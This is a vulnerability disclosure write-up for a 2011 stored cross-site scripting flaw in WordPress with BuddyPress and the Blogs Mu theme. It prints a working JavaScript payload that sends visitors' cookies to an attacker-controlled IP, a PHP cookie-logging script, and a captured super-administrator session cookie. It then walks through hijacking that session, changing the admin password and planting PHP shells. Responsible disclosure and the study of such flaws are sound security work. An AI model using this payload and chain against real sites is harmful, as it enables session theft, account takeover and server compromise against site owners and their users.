Wordpress + Buddypress + Blogs Mu theme = XSS to Super Admin to Server Compromise
----------------------------------------------------------------------------------

Cross-site scripting (XSS) vulnerabilities tend to be seen as one of the less serious security issues. Sometimes XSS can be serious, leading to complete server compromise...

Severity: High

Vulnerable setup:
PHP<=5.2 (tested on CentOS 5), Wordpress<=3.1.4, Buddypress<=1.2.10 (with bbPress forum integrated), Blogs Mu theme<=1.2.6

Victim box's IP:
192.168.0.11

Attacker box's IP:
192.168.0.4

By registering to the Wordpress site as a regular 'subscriber' (here I use 'regularuser' as the username), and then signing in, it is possible to submit the
following javascript to the page at http://192.168.0.11/members/regularuser/settings/profile-css/ (in my test), the page can also be accessed via the themes bar at the top of the page:

<script>
var http = new XMLHttpRequest()
var url = "http://192.168.0.4/xss.php?" + "t=" +
encodeURI(top.document.title) + "&c=" + encodeURI(document.cookie);
http.open("GET", url);
http.send();
</script>

The xss.php script looks as follows, and simply dumps the user cookies
of whichever user visits the
http://192.168.0.11/members/regularuser/profile/ page (social engineering can be used to get particular users to visit this page):

<?php
$usercookies = fopen('cookies/cookies.txt', 'a');
fwrite($usercookies, "Site|Username|Page: " . urldecode($_GET['t']) .
"\t" . "Cookie: " . urldecode($_GET['c']) . "\n");
fclose($usercookies);
?>

Opening the 'cookies/cookies.txt' file reveals the following
information (after the Wordpress super administrator has signed in and then
viewed the public profile for 'regularuser'):

Site|Username|Page: test site | regularuser | Profile   Cookie:
wordpress_test_cookie=WP Cookie check;
wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1=admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4

By signing in as 'regularuser' and then editing his existing cookie to 'wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1' with the value 
'admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4', the attacker has completely compromised the Buddypress components of the Wordpress installation, essentially signing in as the super administrator, and being able to do anything the administrator can do via Buddypress (for example, sending messages to all users of the Wordpress site).

Further, it is possible to completely compromise the Wordpress installation by then going to:

http://192.168.0.11/members/admin/settings/general/

And changing the administrator password, after which going to:

http://192.168.0.11/wp-admin/

Allows the attacker to control the whole Wordpress site as the super administrator (without even entering the new password). 

By editing PHP files within the Wordpress directory tree, PHP shells or backdoors can be added, compromising the server.

To defend against this simply upgrade outdated installations of Wordpress, Buddypress and the Blogs MU theme.

Timeline:

19 September 2011: vendor notified.
<=23 September 2011: Buddypress updated to 1.5 and Blogs Mu theme updated to 1.2.7, issues fixed.